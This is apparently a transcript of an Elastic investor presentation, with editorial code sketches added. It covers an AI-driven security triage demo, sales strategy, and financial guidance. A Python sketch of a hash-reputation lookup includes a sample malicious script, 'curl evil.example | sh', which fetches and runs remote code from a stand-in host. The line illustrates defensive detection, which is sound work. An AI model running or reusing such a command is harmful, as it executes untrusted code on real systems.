James Spiteri
Director of Product Management, Security, Generative AI, and Automation, Elastic

Perfect. All right. Hello, everyone. Let's dive right into Security. Can you all see this? Perfect. Just as David described how challenging it is to work with logs, security teams face a very similar daunting challenge with what we call alerts. Every day, they log into their security analytics platform, and they're faced with screens like this. They're faced with situations where, within a 24-hour period, they have 1,000 alerts or warning messages to deal with. These could all potentially indicate something bad happening within their enterprise. These alerts can span multiple systems, multiple networks, multiple technologies. The traditional way of trying to find out, hey, is this something I should investigate, are they related or not, is to go through each and every single one of these manually and try to figure that out.

As Santosh and everyone else were saying, about a year and a half ago, when the Security industry was figuring out how to embed AI, we released Attack Discovery, where users don't have to go through that mess of alerts anymore. They go from 1,000 things to deal with to, in this case, nine active attacks, the nine attacks within their organization which matter most. We've made this so simple for our users that any analyst of any skill level can understand it, and it will work across all types of alerts and all types of data sets. This particular ransomware attack, for example, we explain very clearly in natural language. We very clearly highlight the hosts and other entities involved. We describe what we call the attack chain.

As an attacker within my environment, what did they do to actually be successful with this attack? It's a really easy way for someone to digest and understand. Just to see the impact of how powerful Attack Discovery is, this one attack alone is made up of 148 of those alerts. Can you imagine a human being sifting through all those 1,000 alerts, finding these 148, stitching them together, and writing out the story nicely and neatly? It would have taken hours. That's, unfortunately, what the industry has been used to. Last year, as Elastic, we changed the game thanks to the power of our platform and large language models. Of course, usually what would happen next is, as a security analyst, I would need to grab this and do root cause analysis.

I need to find out within our organization, how do we go from an attack like this one to be able to eradicate and contain the threat? Of course, this is something where our AI Assistant, our conversational agent, comes into play. Traditionally, before this stuff was available, analysts would have hundreds of wikis or pages and procedural documents that they would need to follow. They would have to manually sift through them or use traditional searches to try and find keywords here and there. That no longer works in this particular situation. We've brought Search AI platform to the mix. We've grounded the responses from the AI Assistant with their own data.

Now, for this particular attack, they have an extremely tailored guide of what they should be doing within their organization, really clear steps to follow, really clear evidence and advice of what to do next. We've generated queries for them in case they want to dig deeper, so on and so forth. As an example here, one of the first immediate steps that the assistant has told me is, look, you're going to want to take this host offline. You're going to want to eliminate the spread of this ransomware by isolating this host. Thanks to our XDR capabilities, as an analyst, I'm able to grab this remediation guidance from the assistant and straight away run it in what we call our response console, meaning any endpoint which I'm monitoring with Elastic Security, I can take this action right within the same window.

We're able to do that because of our advancements with XDR. We can support multiple different systems with this. You can see already how much easier we've made the lives of our users with Attack Discovery, with the assistant, and many other AI features that we've implemented. We want to do even more. We want to be able to eliminate the few manual clicks that I did today. This is where workflow automation is really going to come into play. We're going to be able to not only tell analysts when an attack happens or give them remediation advice, we're going to be able to do all the triage for them automatically. We're going to be able to provide these agentic AI flows to eradicate the threat.

They go from having to look at a view of alerts or a view of attacks to going to a view like this, where, hey, look, we already triaged this with AI for you. We've decided we can close these alerts. Perhaps this alert needs a bit more work. We're going to assign it to this particular user. At the end of the day, what the user actually ends up with is a message like this, where, hey, here's what we detected in your environment. Here's everything we did when we detected that threat. We took this host offline. We quarantined some files. We created a case for you. We reached out to whoever is involved in this attack. There might be a few things left for you to do. We're going to tell you exactly what to do.

This is the future with workflows, which is really exciting for us. We saw with Steve the power of Agent Builder and the conversations we can have there with agents and also with workflows. What we've done, as Steve already demonstrated, is we've brought workflows to Agent Builder. In the Security world, our users are going to have potentially hundreds of these workflows that they've built, hundreds of automations that are going to run automatically in the background or perhaps on a schedule. They're immediately transferable to Agent Builder, so people can converse with them without having to do any additional work, which is really phenomenal power to be able to give our users. In this example here, I have my Agent Builder.

I've created what we call a threat hunting agent, an agent specifically designed to work with security data, whether that's structured or unstructured text, but also be able to take some of these actions with workflows. What I'm going to do is ask a very typical question that a security analyst might want to ask. I'm going to ask, look, can you provide a summary of the top 10 processes run by administrator? What this is going to bring to me is full natural language searching of our structured and unstructured data at the same time. Agent Builder is going to identify what it should do. It's going to do that thinking step here. It identified, in this case, I'm going to run a query. It found the top 10 processes run by administrator. Some of these I recognize, but some I don't, especially this one.

I don't really recognize this here as an analyst. It's really caught my eye as something I want to investigate further. What I'm going to do is ask Agent Builder here, look, what is this particular process? Agent Builder is going to identify what it needs to do to give me that answer. It's going to grab what we call a hash, which is a unique identifier for that file. It identified it should run a query to do that. Then it's going to look up that hash, that unique identifier, against what we call a reputation system. Is this file malicious? Have any other vendors seen this particular file? In this case, it said, yes, this is a malicious file. It broke this down to me in a way that's really easy to understand. It did that by invoking a workflow to pass that hash onto this reputation service.
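
That hash-and-lookup step can be sketched as follows, with a local stub standing in for the external reputation service:

```python
import hashlib

# Sketch of the hash-then-reputation-lookup step from the demo: hash the
# file contents, then ask a reputation source whether that hash is known
# bad. The reputation table here is a local stub; a real workflow would
# call an external service, and all entries below are invented.

REPUTATION = {}  # sha256 hex digest -> verdict

def file_verdict(contents: bytes) -> str:
    """Hash the file and look the digest up in the reputation source."""
    digest = hashlib.sha256(contents).hexdigest()
    return REPUTATION.get(digest, "unknown")

# Seed the stub with one "known bad" sample for illustration.
sample = b"#!/bin/sh\ncurl evil.example | sh\n"
REPUTATION[hashlib.sha256(sample).hexdigest()] = "malicious"
verdict = file_verdict(sample)
```

The hash is what makes this safe and cheap: the agent never has to ship the file itself, only a fixed-length fingerprint.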

The next thing I might want to do is, OK, we know we have some form of malicious file in my environment. I need to open up an incident. I need to make the people who are on call aware. I don't want to really leave the screen. I want to keep investigating with Agent Builder, but I also want to start that process. We're going to ask Agent Builder to go ahead. We're going to say, look, can you please check who's on call? That's the first thing we're going to ask them to do. Create a Slack channel for this incident. What we want is to also summarize all the findings so far. See how many instructions I'm giving Agent Builder here. Add the person who's on call, add the on-call user to the Slack channel, and explain what steps to take next. A long list of instructions.

Typically, I would have to go to some other system, find out who's on call, manually go create a Slack channel, or go somewhere else to run the workflow, and so forth. In this case, Agent Builder is going to go ahead and do that for me. It checked our on-call schedule, which is unstructured text in this case. It found who's on call. It identified that to create a Slack channel, it needs to call the workflow to do that. It added the on-call user, who in this case is also James, to that Slack channel. Lastly, it summarized everything that James needs to do. If we go to our Slack here, we'll be able to see all of that. This channel was just created. You can see that at 3:40 P.M., James was added and given all the information he needs to continue this investigation.
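
A minimal sketch of chaining those instructions, with stub steps in place of the real on-call, Slack, and summary integrations (all names here are hypothetical):

```python
# Sketch of the multi-step instruction the agent carried out: read the
# on-call schedule (unstructured text), create a channel, add the
# on-call user, and summarize. Each step is a stub; in the demo these
# are Agent Builder workflows calling real systems.

def check_on_call(schedule_text: str) -> str:
    # A trivial parse stands in for the agent reading free-form text.
    for line in schedule_text.splitlines():
        if line.startswith("on-call:"):
            return line.split(":", 1)[1].strip()
    return "unknown"

def run_incident_workflow(schedule_text: str, findings: str) -> dict:
    """Chain the steps: who's on call -> create channel -> add user -> summarize."""
    user = check_on_call(schedule_text)
    channel = {"name": "incident-malicious-file", "members": [user]}  # stub for Slack
    return {"on_call": user, "channel": channel, "summary": findings}

state = run_incident_workflow("team: sec\non-call: James",
                              "malicious file found on web-01")
```

The interesting part in the product is that these steps are expressed in natural language and the agent decides which workflow to invoke at each one.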

To recap, we went from a world where our users are manually investigating thousands of alerts. We fixed that with Attack Discovery. We allowed our users to eradicate the threat using assistant guidance with our XDR platform. Now, with Agent Builder, we've brought the full functionality of context engineering to the security user to be able to contain, eradicate, and solve security incidents. Santosh, back over to you.

Santosh Krishnan
Group VP and General Manager of Security and Observability, Elastic

Thanks, James. It's amazing. Let me leave you with a summary of our opportunity in the Security space. As you can see, behind all the innovations which you actually just saw, our opportunity here is to grow our SIEM market share. Mind you, we are already doing well in the SIEM space. We are one of the fastest growing vendors in that space. Our opportunity is to grow that market share further through, again, displacement and augmentation strategies, which I mentioned earlier, so that we can help our customers realize this future of the AI-powered security operations center. An additional opportunity that we have is to grow beyond SIEM, largely into use cases like XDR and CDR by providing that same unified platform. You can bring all your data together into a true platform to detect, investigate, and respond across your entire IT real estate.

With that, let me actually bring Ken back on stage to summarize.

Ken Exner
Chief Product Officer, Elastic

I'll wrap up. Thank you. Just to wrap up the product section, I think you hopefully see that we have a lot of conviction that we have a huge opportunity in AI. I'm going to summarize it as two opportunities. One is we have an opportunity to become a fundamental part of the generative AI and agentic AI tech stack. As a vector database, as a context engineering solution, we have an opportunity to be part of that tech stack. I think the other opportunity that I'm super excited about is using those same tools ourselves to disrupt the Observability and Security space.

I think the Observability and Security space are going to see a lot of change because of AI. There are lots of manual things that happen in these two spaces. There is lots of pattern matching, things that are going to be much better done by machines than by humans. I think we have an opportunity because we are developing these same tools to lead in that disruption of Security and Observability. With that, I'd like to end the product section. We're going to have a break now. We're going to take about 12 minutes. If we can be back in the room at 3:55 P.M., we'll go through the go-to-market and finance sections. See you at 3:55 P.M. Thank you.

Mark Dodds
Chief Revenue Officer, Elastic

Good afternoon. I'm excited to talk to you today about the transformation we've been driving in the go-to-market part of our business and to share with you the momentum we're seeing and the opportunity ahead. Ash mentioned to you that we have the advantage of incumbency. We're trusted by leading organizations around the world across all segments. Our Search AI Platform provides incredible value to customers for Search, Observability, and Security. I'm telling you, we are just getting started. Now, many of you know I came to Elastic 20 months ago as Chief Revenue Officer. After I arrived, we embarked on a process to evaluate and assess our go-to-market motions, our systems, our processes, and our teams. We took a number of actions to get better as an organization. We're seeing results now, and we're continuing to make refinements to get better. This is a never-ending process for us.

All of this is designed to let us serve more customers and drive more growth for Elastic. I wanted to share some of the improvements we've made in the areas we focus on to drive our execution. Number one, segmentation and coverage. I'm going to double-click on this in a minute. What we found is that we had outgrown our previous model. We had an opportunity to do a better job of aligning our sales capacity to our largest opportunities. Number two, incentives. We've aligned our sales incentives to drive incremental growth for Elastic and capture the AI opportunity in front of us. Number three, operational rigor. We're running the sales organization with a much higher degree of operational rigor.

This includes everything from how we forecast, how we generate and track demand, how we progress pipeline through the funnel, how we maintain pipeline hygiene, and how we review deals. All of this is being done at a much greater level of granularity. Importantly, we're doing it consistently around the globe, up and down the organization. None of that would be possible without, number four, improvements in our systems, our tools, and our underlying data. My RevOps team has done a great job here transforming how we run the business. We've also made improvements in generating demand and creating pipeline. We track this every two weeks in great detail. Our marketing team is doing a better job than ever. Our sales development team is doing a better job of processing leads. Our sales team and our partner organization are generating more and more opportunities.

We focused our teams on three specific sales plays, which I'll share with you in a minute. The other area that I'll highlight is we've gotten better at hiring. We've reduced the cycle time for hiring. We're now tracking that with the rigor that we do our forecasts. We've gotten much better at onboarding and enabling our sellers. We've invested in an underlying enablement platform that we didn't have before. We've gotten more structure, and I'm really happy with the results. Now, let me jump in for a minute on segmentation and coverage, because I know this was a topic of conversation five quarters ago. Like most tech companies, at a high level, we segment the market between enterprise, commercial, and SMB. SMB for us is our monthly cloud business, our product-led growth.

What we wanted to look at after I got here is how we were assigning accounts. What was the logic we were using to assign accounts into enterprise, commercial, and SMB? How many accounts did we have assigned in each? How did we assign sales coverage to those accounts within the segments? What we found is that we had outgrown the processes we were using. We weren't aligned to best practices, and we weren't applying our sales capacity to our greatest opportunities. We went through a process of evaluating all of our accounts by looking at their total addressable spend on the solutions we sell, their propensity to buy Elastic, which took into account a number of variables, and their historic spend. We used that to place accounts in the right segment.

Now, we've evolved this, and I'll share with you at a high level how we segment the market today: still enterprise, commercial, and SMB. At the top, in enterprise, we've subsegmented. A small number of our largest potential customers are in strategic, where we have our densest sales coverage. The bulk of our enterprise accounts are in the enterprise block. What we've done here, particularly in our large markets where we have density, is have reps and entire teams focused on one of two motions: either expanding with existing customers or landing new logos. We've followed that same logic in commercial. You can see the commercial expand and commercial hunter segments, and then we built out what we call commercial general business. We literally moved thousands of accounts out of enterprise and out of the top two levels of commercial into general business.

Not that these accounts aren't important, but they represent smaller opportunities, and we wanted to align our coverage, and the cost of that coverage, to those opportunities. We built out an inside sales team at lower cost. This allowed us to do a couple of things. One, our enterprise and our commercial expand and hunter account executives now have dramatically fewer accounts, so in the case of expand, they can go deeper in those accounts. For hunter reps going after new logos, they can focus on the accounts with the greatest opportunity. As I mentioned, we have territories and teams focused on one of those two motions, so they can get really good at it. Before, our account executives had a large number of accounts, a mix of install base and white space, and they weren't able to be proactive.

What we're seeing now is that we're in opportunities and winning deals with customers we've never been in before, because our reps have more time to focus. In addition to this work, we've made strategic investments in the field in other areas to drive greater customer intimacy, drive the productivity of our account executives, and shorten our sales cycles. The customer architects listed here on the screen are our post-sales engineers who work with our customers to get the most value out of Elastic. They help our customers take advantage of the latest features, like what you saw demonstrated here today. They also help our customers optimize their implementations to make sure they're running efficiently, because we know that if our customers are using Elastic efficiently and using our latest technology, they're going to be customers for life.

We've made additional investments in specialists in the sales organization. For example, 18 months ago, we built out a team of Gen AI specialists to work with our account teams because we saw this opportunity exploding. We charged our sellers with going to their customers and finding out who's building Gen AI applications, what vector databases they're testing, and what they're trying to accomplish. Once they get to those decision makers, we bring in these specialists. They're having a huge impact. We've also expanded the specialist team for Security. We've long had technical security specialists, but we added sales security specialists to help us get in front of more opportunities and get us into more at-bats. You saw the technology that Santosh and his team demonstrated. We win when customers evaluate Elastic, so we want them to go test us.

We want them to look at other competitors, because we win. We're just going after more at-bats. We've built out a value engineering team that builds ROI models and executive messaging to help our sales teams close large transformational deals, oftentimes helping customers migrate off of legacy incumbents to Elastic. On the low end, we have a large number of low-dollar renewals, so we built out low-cost renewal managers to run a repeatable process, and they're driving our renewal rates up. The other area where we've driven transformation is our sales plays. We went from a fragmented model to three focused sales plays. We treat these like products. They're designed with intent, measured with rigor, and scaled with discipline. Each of them has training for our sellers, content, collateral, and models to use when we engage with customers.

The three plays are: Victors in Vectors, which is our Gen AI play. The second is Race to Displace, where we're going after legacy incumbents. The third is Free to Paid, just as described. This isn't a new motion for Elastic; we've converted free users to paid for a long time, but we've gotten more structured in how we do that. We've given our sellers insights into who's using free Elastic and how they're using it, and we're giving them tools so they can go to their customers and show the value of moving to paid Elastic. These transformations are driving results. I'm really happy with my team, and I'm proud of how my leaders have leaned in. What we're seeing is better performance, consistency, and predictability. We've had four straight quarters of strong sales results, which you've heard on our earnings announcements.

I'll also share with you that we've seen improved productivity. Last year, our productivity per AE, per account executive, was up high single digits after previously declining. We saw meaningful improvement in sales efficiency, meaning that we're getting a better return on our investment in the sales organization. Because we have the right foundation and we now have an investable model, we've been thoughtfully and systematically adding sales capacity to drive our growth for the future. Some other signals of our success: we grew the number of accounts greater than $100,000 ACV by 14% last year, and we grew the average per customer in that cohort. We saw that continue in Q1. I'm very excited to share what we've seen in growth of our million-dollar-plus customers. We grew 27% last year. We continue to grow at that pace in Q1. All of that, I'm happy about.

I'm excited about what we've accomplished. I'm really excited about the future, and I'll show you why. Ash Kulkarni mentioned that over 50% of the Fortune 500 are paid Elastic customers. When I widen the aperture to the Global 2000, it's only 42%. That means we have 58% still to convert to Elastic customers, and I know we can help them. This is part of why we now have dedicated territories and dedicated teams focused on getting better at landing new logos. If you put that aside and look at our existing customers, what this shows you is that only 19% of them use us for more than one solution, but that 19% represents 75% of our sales-led ARR.

We have a massive opportunity to expand in our existing customers, and that's why we have territories and entire teams focused on expand, going deeper with these customers. With fewer accounts per AE, they can go deeper, learn about customers' problems, show them how we can solve those problems, and go to new buying centers to expand. I want to show you a customer journey with Elastic. This happens to be a U.S.-headquartered retailer with physical stores around the country and a large web presence. They started with Elastic a few years ago with Observability on self-managed, and you can see that their ARR with us was flat for two years. Then they chose us for Search in the cloud, and their ARR doubled.

Shortly after that, we went through our segmentation exercise, and the enterprise AE who covers this customer was able to spend more time with them, better understand what they're trying to accomplish, and learn about their challenges. We started helping them create the next-generation e-commerce experience, and they chose us for vector search and our generative AI capability. They also started using our AI Assistant in Observability, and their ARR doubled. We see opportunity for this to continue to grow as their new e-commerce platform goes into full production.

It's an example of a customer going from self-managed to cloud, from one solution to two, and of the opportunity we have when customers move from regular keyword search to vector search. I'll close with this. We've made a lot of improvements. I'm really proud of my team; we're operating at a high level, but we're continuing to drive improvements. We're now investing in capacity for the future in order to capture the AI opportunity at hand. What I can tell you is, it's a great time to be at Elastic. Thank you. I will now turn it over to our Chief Financial Officer, Navam.

Navam Welihinda
CFO, Elastic

Welcome, everyone. I'm Navam. Thank you, Mark. Great to see you today. You've heard about Agent Builder. You've heard about Streams. You've heard about Workflows. There's a ton of innovation we're driving at the company. It's truly a dynamic and exciting time to be here. Before I get into the finance material, I want to start by summarizing what you heard from my colleagues about the Elastic advantage. First and foremost, we are a company with a massive amount of platform innovation. Customers use us where data has gravity, be it on the self-managed side or the cloud side, and we are driving innovation in both. You've heard from my colleagues Ken, Steve, and Santosh about the features and functionality we're driving into both the cloud and self-managed platforms. Second, you just heard from Mark. Our GTM strategy is gaining momentum.

Mark talked about the revamped strategy we have in place. It's been in place for over a year now. We are adding customers efficiently, and we are expanding them. Third, you heard from Ash about our unparalleled advantage in unstructured data, relevance, and context engineering. This is our defensible moat. Because of this advantage, we were made for the Gen AI era, and we're ready to take on the Gen AI opportunity ahead of us. In my section, I want to talk about how we turn these advantages into what you're all here for: revenue growth, attractive margins, and growing free cash flow. Before we do that, I'm going to run through the progress over the last five years pretty quickly to set a baseline.

We have built a solid base of over $1.5 billion in trailing-12-month revenue, and at the same time, we've been increasing revenue at double-digit rates. This revenue comes from three sources. The bottom of the graph is our sales-led subscription revenue. The middle is the monthly cloud business, which is self-serve. The top of the graph is our services business. Our professional services business is in support of our sales-led subscription revenue; we sell it to help our sales-led subscription customers grow. It's about lowering barriers to adoption and shortening time to value. The monthly cloud business consists mostly of SMB customers. In the past, this grew with high SMB spend. Around 2022, you saw SMB spend moderating, and those are the dynamics we're facing today.

Over the past few years, we've matured as a company, and we've focused mainly on larger strategic accounts and high-propensity commercial accounts, as Mark talked about. We serve this segment through a sales-led motion. This sales-led motion leads to sales-led subscription revenue, and let's take a look at that in more detail. We've maintained a very strong growth rate in sales-led subscription revenue. In 2025, we grew 20%, and this sales-led subscription revenue is becoming a bigger and bigger percentage of our total revenue. In 2025, this revenue line reached 81% of our total. This is the segment we spend most of our time and effort on and our investment in. We tell our sales teams, and we incentivize our sales teams to go get customers in this segment, either in self-managed or cloud, and we incentivize them to meet our customers where they are.

As you think about our business, and as we think about it, sales-led subscription revenue is the primary barometer of our success. Not just cloud, not just self-managed: sales-led subscription revenue in aggregate, both of them together, is how we measure success. We delivered these strong revenue lines while rapidly advancing our operating profit and free cash flow margins. On the graph on the left, you'll see our non-GAAP operating profit margins. We reached break-even in 2022 and have been consistently adding operating profit since, ending at 15% in 2025. Free cash flow follows a similar trajectory. As shown in the chart on the right, we reached a 19% adjusted free cash flow margin in 2025. What you're seeing here is the inherent leverage in our model.

We have high product gross margins, and we have leverage on our sales and marketing and G&A line items. That's what allows us to deliver these strong operating profit and free cash flow lines. We expect this to continue. With improving profit margins, improving free cash flow margins, and strong revenue growth, we're continuing to make progress toward the Rule of 40. In FY 2023, we had a Rule of 40 score of 29%, and we've progressively grown that to 36% by FY 2025. Rule of 40 is how we think about balancing investment in growth with delivering free cash flow. That's the state of the business over the past five years. Very strong metrics. A few slides ago, I talked about the importance of sales-led subscription revenue.
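The Rule of 40 arithmetic referenced here is simply revenue growth rate plus free cash flow margin. A minimal sketch, using the quoted 19% FY 2025 adjusted free cash flow margin; the ~17% growth input is implied by the stated 36% score, not quoted directly:

```python
def rule_of_40(revenue_growth: float, fcf_margin: float) -> float:
    """Rule of 40 score: revenue growth rate plus free cash flow margin.

    Both inputs are fractions, e.g. 0.17 for 17%.
    """
    return revenue_growth + fcf_margin

# FY 2025: 19% adjusted FCF margin; a 36% Rule of 40 implies ~17% growth.
score = rule_of_40(0.17, 0.19)
print(f"Rule of 40: {score:.0%}")
```

The same function reproduces the FY 2023 figure (29%) for any growth/margin pair summing to 0.29; the transcript gives only the combined scores for that year.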

These next few slides and sections are about diving deeper into that revenue line item. I want to talk about sales-led subscription momentum and how we can support this and make it a durable business. Let's take a look at some data. Mark mentioned this. Our GTM strategy is anchored on our highest value customers, while at the same time, our product team is delivering continuous innovation, leading the market in Search, Observability, and Security. This tech is resonating with these customers. More and more customers are joining our $100,000 customer ranks and $1 million customer ranks. The $100,000 customer rank that you see here on the left accounts for the majority of our sales-led revenue. It's 87% of the total. These customer counts are consistently increasing. At the same time, if you look at our average customer value, that's growing over time as well.

Let's look at how we're able to drive this growing average customer value. On the left-hand side, we have a powerful model of landing new customers and expanding them, growing our $100,000 and $1 million ranks. New customers in the beginning drive a smaller amount of ARR, but that ARR compounds over time with expansion. Our platform basically is meant to adapt and scale with customers bringing in data, helping them become more efficient. This includes some of the largest customers in the world. The flexibility and scalability of our platform is the key differentiator for these customers and the reason we succeed with these customers. Customer expansion is driven by them bringing in more and more data into our platform, creating more workloads, and then upgrading to higher subscription tiers to get premium features, and then also adopting multiple solutions as they go deeper into our platform.

All of these dynamics result in a high sales-led net retention rate. In Q1, we saw a sales-led net retention rate of 113% on a trailing-12-month basis. This was driven by the strong expansion I talked about and stable gross retention. We've built a durable customer base, and there's great expansion opportunity from both new and existing customers. We still have a long way to go. On the new customer side, when you look at the G2K customer count, the graph Mark showed you before, we still have a lot of white space: 58% of the G2K customer base have yet to become Elastic customers. That's a lot of white space for us to go get. The existing customer side has a lot of opportunity as well. On the left-hand side, I think you've seen this graph before; Mark talked about it. 19% of our customers use more than one solution, two or three solutions, and they contribute 75% of our sales-led ARR.
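Net retention, as described here, nets expansion against churn over a starting base. A sketch of the standard formulation; the dollar inputs below are purely illustrative (Elastic's actual inputs are not disclosed in the transcript), chosen to reproduce a 113% result:

```python
def net_retention_rate(starting_arr: float, expansion: float, churn: float) -> float:
    """Net retention: ending ARR of the starting customer base / starting ARR."""
    return (starting_arr + expansion - churn) / starting_arr

# Illustrative only: $100M starting ARR, $18M expansion, $5M churned
# yields the 113% net retention rate quoted for Q1 (TTM).
nrr = net_retention_rate(100.0, 18.0, 5.0)
print(f"NRR: {nrr:.0%}")
```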

We see much higher ARR per customer after they adopt multiple solutions. On the right-hand graph, you'll see that the median for a three-solution customer is 12x that of a single-solution customer. This is our opportunity. As we make inroads with existing customers, we expect workloads to grow, and Ken highlighted how we've architected our solutions to make things more efficient for our customers, incentivizing them to bring more into our platform and adopt more and more of our solutions. This is our repeatable playbook for years to come. There's a lot more growth left for us. Those are the expansion dynamics of our sales-led subscription revenue.

I want to talk about what gives us confidence in the future by taking a deeper look at our customer cohorts. What are you seeing here? This chart displays our sales-led subscription revenue customer cohorts from FY 2013 to FY 2025. Each band and color shade represents a cohort of customers based on when they first became an Elastic customer. If we draw a dotted line from the end of FY 2020, you'll see that there's a good balance of growth from longstanding customers and newer customers: almost a 60/40 split, with customers from before FY 2020 contributing 61% of our recent growth and customers since FY 2020 contributing 39%. This is a good, balanced growth dynamic from our customer cohorts.

The cohort data also revealed three very important takeaways, which I'll go into, related to the durability of our cohorts, the resiliency of our cohorts, and the Gen AI tailwinds we're beginning to see over the past couple of years. Let's dive a little deeper into the cohort data and talk about these three key takeaways. The first takeaway is that these cohorts show remarkable durability. This is a chart of our most mature cohorts, and even these cohorts are still expanding. Though some of these customers have been with us a while, and normally you would expect their ARR to be more stable, they behave like our new customers. They're bringing in more data, and they're very active. The FY 2013 through FY 2020 customers, as a group, grew their sales-led ARR by 10% last year.

Even these customers continue to be remarkably active, just like our new customers. This expansion durability supports our growth algorithm. The second takeaway is that we see remarkable resiliency from our customer base. You all remember calendar 2022. It was a challenging time for software; I was there as well. Like most of the industry, everybody faced budget constraints and was forced to prioritize optimizing their spend. Our customers were no different; they faced the same dynamics. We worked with our customers to reduce their spend and encouraged them to adopt new features of ours, like frozen tier storage, which helped them become more efficient. The aggregate result of all that was a slower expansion rate in that period, but we also did not see an elevated churn rate.

Once those headwinds passed, the growth trajectory continued. That was a great data point demonstrating, one, how resilient our customers are, and two, how much value they see in our platform. With the amount of innovation we put into the platform, they are making our software essential technology in their workflows. This is great news. The third takeaway relates to the tailwinds we are beginning to see with Gen AI. This graph shows the year-one-to-year-two ARR expansion of each cohort over the past six years. FY 2024 is showing greater year-one-to-year-two growth than any of the cohorts in the recent past.

The dotted line you see represents the FY 2019 through FY 2023 cohort average, which is 20%. FY 2024 is twice that, at 42%. This is a significant data point because that's the first cohort that saw a full year of Gen AI impact in its first-year growth. In fact, if you look at the FY 2024 cohort in a little more detail, you'll see that 11% of the cohort adopted some kind of Gen AI functionality, and that minority contributed more than 60% of the cohort's net expansion. This is an excellent outcome, and it's the data point we have for the accelerated revenue growth we see when customers adopt Gen AI use cases.

When you look at it more broadly, at our aggregate ARR in FY 2025 split between customers who use Gen AI and customers who do not, there is a clear difference in expansion rate. We see a 6% tailwind from customers who are using Gen AI. Gen AI is driving acceleration for us right now. While we're seeing all these promising results related to Gen AI, it's important to remember we're still in the very early innings of customer adoption. We've seen strong adoption among our $100,000 customers, with more than 20% using Gen AI features; we've made strong progress moving from 4% to 21%. There's still a fair amount of room for our customers to start using Gen AI and grow into the ranks of the $100,000 category.

Even the customers in the $100,000 category are still in their infancy in the number of apps that are Gen AI enabled. They're going to build more and more apps, which will take them further into their Gen AI journey and create more maturity and more tailwind for us. All right. I've now shown you a lot of our cohort data and expansion data, and you've seen how our sales-led customers behave. I've talked about how durable and resilient our customer base is and how we're starting to benefit from Gen AI tailwinds. Next, and I know this is something you've been looking for: how do you put this all together into a midterm framework? Let's go there next.

We view sales-led subscription revenue, both self-managed and cloud, as the midterm growth engine of our company. This growth comes from two components. The first component is the continued execution of our land and expand model on the core Search, Observability, and Security use cases, on our existing customer base and the new customers we're going to add in the G2K. We discussed the durability of our customers, and we discussed the white space in the customers we have yet to win. We expect a 15%+ growth rate for our sales-led subscription revenue by the medium term, not counting the benefits of Gen AI.

The second component, still in its early stages, is the continued penetration of generative AI among our sales-led customers, both in terms of the number of $100,000 customers we can add and the penetration and maturity within those $100,000 accounts. We expect a gradual 5%+ tailwind as generative AI adoption increases among our customer base. We expect this core execution plus the tailwind to result in a 20%+ target growth rate in the medium term. As always, we will operate with operating expense discipline, and we intend total revenue growth plus adjusted free cash flow margin to result in a 40%+ Rule of 40 target. Let's take a look at this in a little more detail. As I mentioned, the sales-led subscription revenue target growth rate is 20%+.
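The framework's arithmetic, a 15%+ core growth rate plus a 5%+ Gen AI tailwind compounding forward, can be sketched as follows; the three-year horizon and the index base of 100 are assumptions for illustration, not figures from the presentation:

```python
def project_revenue(base: float, growth_rate: float, years: int) -> list[float]:
    """Compound a starting revenue figure forward at a constant growth rate."""
    out = [base]
    for _ in range(years):
        out.append(out[-1] * (1 + growth_rate))
    return out

core, genai_tailwind = 0.15, 0.05   # 15%+ core growth, 5%+ Gen AI tailwind
target = core + genai_tailwind      # 20%+ combined target growth rate

# Indexed to 100, three years at 20% compounds to roughly 120, 144, 172.8.
print([round(x, 1) for x in project_revenue(100.0, target, 3)])
```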

From those two components, the base growth rate and the generative AI tailwind, the sales-led subscription revenue line is expected to be 85%-90% of our total revenue. Both non-GAAP operating margin and adjusted free cash flow margin are expected to exceed 20%, driven by disciplined OpEx management and operating leverage. Finally, we expect to maintain a net dilution rate below 2.5% as we remain disciplined in adding headcount while staying competitive in the talent market. When you look at our operating margin improvements in the past, you'll see the leverage we have, which gives us confidence in reaching this 20%+ target. As I've talked about, FY 2026 is an investment year for us.

After those catch-up investments, we expect to decrease sales and marketing and G&A expenses as a percentage of total revenue and get our operating margins above 20% through the combination of disciplined OpEx in sales and marketing and G&A and our gross margin improvements. Our product gross margins are already above 80%; you can see that in our subscription revenue line. That's grown, and there are further increases to come in our subscription margin line. The combination of higher subscription margins, which results in higher gross margins, and leverage in sales and marketing and G&A will allow us to get to 20%+. You can see the progress we've made in sales and marketing and G&A over the past five years as well. We're confident about hitting this 20%+ target.

Now, given that we're further along in the year, and you've all digested our medium-term framework, I'd like to touch on our current fiscal year in the context of that framework. At the beginning of the fiscal year, we detailed certain macro conditions that were emerging. It was very uncertain; we didn't know what the impact on consumption and commitment patterns would be. We built some of that into the guidance we provided at the beginning of the year, and we essentially carried most of it through after the first quarter. Since then, as we've gotten further along in the year and the quarter, we've gained greater visibility into the demand environment. We feel good about the commitments we're seeing. There are still headwinds; as you've all read in the news, the government shutdown is still ongoing.

We believe we're better positioned than we had originally anticipated. As such, I'm updating my second quarter and full-year guidance to the following. You may remember that in Q2, we guided to $415 million-$417 million. At the time, we were $6 million above consensus at a 14% year-over-year growth rate, and FY 2026 was $1.679 billion-$1.689 billion, also a 14% rate, with a 16% operating margin target. I'm updating this now to a Q2 total revenue guidance of $417 million-$419 million, an additional $2 million above the $6 million we had already raised. For FY 2026, we're updating the range to $1.697 billion-$1.703 billion, which is a 15% year-over-year growth rate. In addition, we expect our non-GAAP operating margin in FY 2026 to be a quarter point higher at 16.25%.
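The size of the guidance move can be checked with midpoint arithmetic. A sketch using only the ranges and the 15% growth rate quoted above; the implied prior-year base is derived arithmetic, not a figure stated in the presentation:

```python
def midpoint(lo: float, hi: float) -> float:
    """Midpoint of a guidance range."""
    return (lo + hi) / 2

# Q2 guidance, in $M: prior range 415-417, updated range 417-419.
q2_raise = midpoint(417, 419) - midpoint(415, 417)      # the "$2 million" raise

# Full-year FY 2026 guidance, in $M: prior 1679-1689, updated 1697-1703.
fy_raise = midpoint(1697, 1703) - midpoint(1679, 1689)  # $16M at the midpoints

# Prior-year revenue implied by the new midpoint at 15% YoY growth, in $M.
implied_base = midpoint(1697, 1703) / 1.15

print(q2_raise, fy_raise, round(implied_base))
```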

Moving on to our balance sheet. We have a strong balance sheet driven by a growing cash balance that's fed by a growing free cash flow line. With our increasing amounts of cash, we have three primary capital allocation priorities. Our first priority is to continue to invest in the business and our platform to position us to win in Gen AI. There's a massive Gen AI opportunity ahead of us, and we need to drive durable growth. The second priority, and this is apt given the announcement we just made, is that we will evaluate and pursue acquisitions that further our strategy, similar to the ones we've just done, and we'll do so with strict financial discipline. These have traditionally been tech and talent tuck-ins to enhance our Search platform or our Observability and Security solutions. This is our second capital allocation priority.

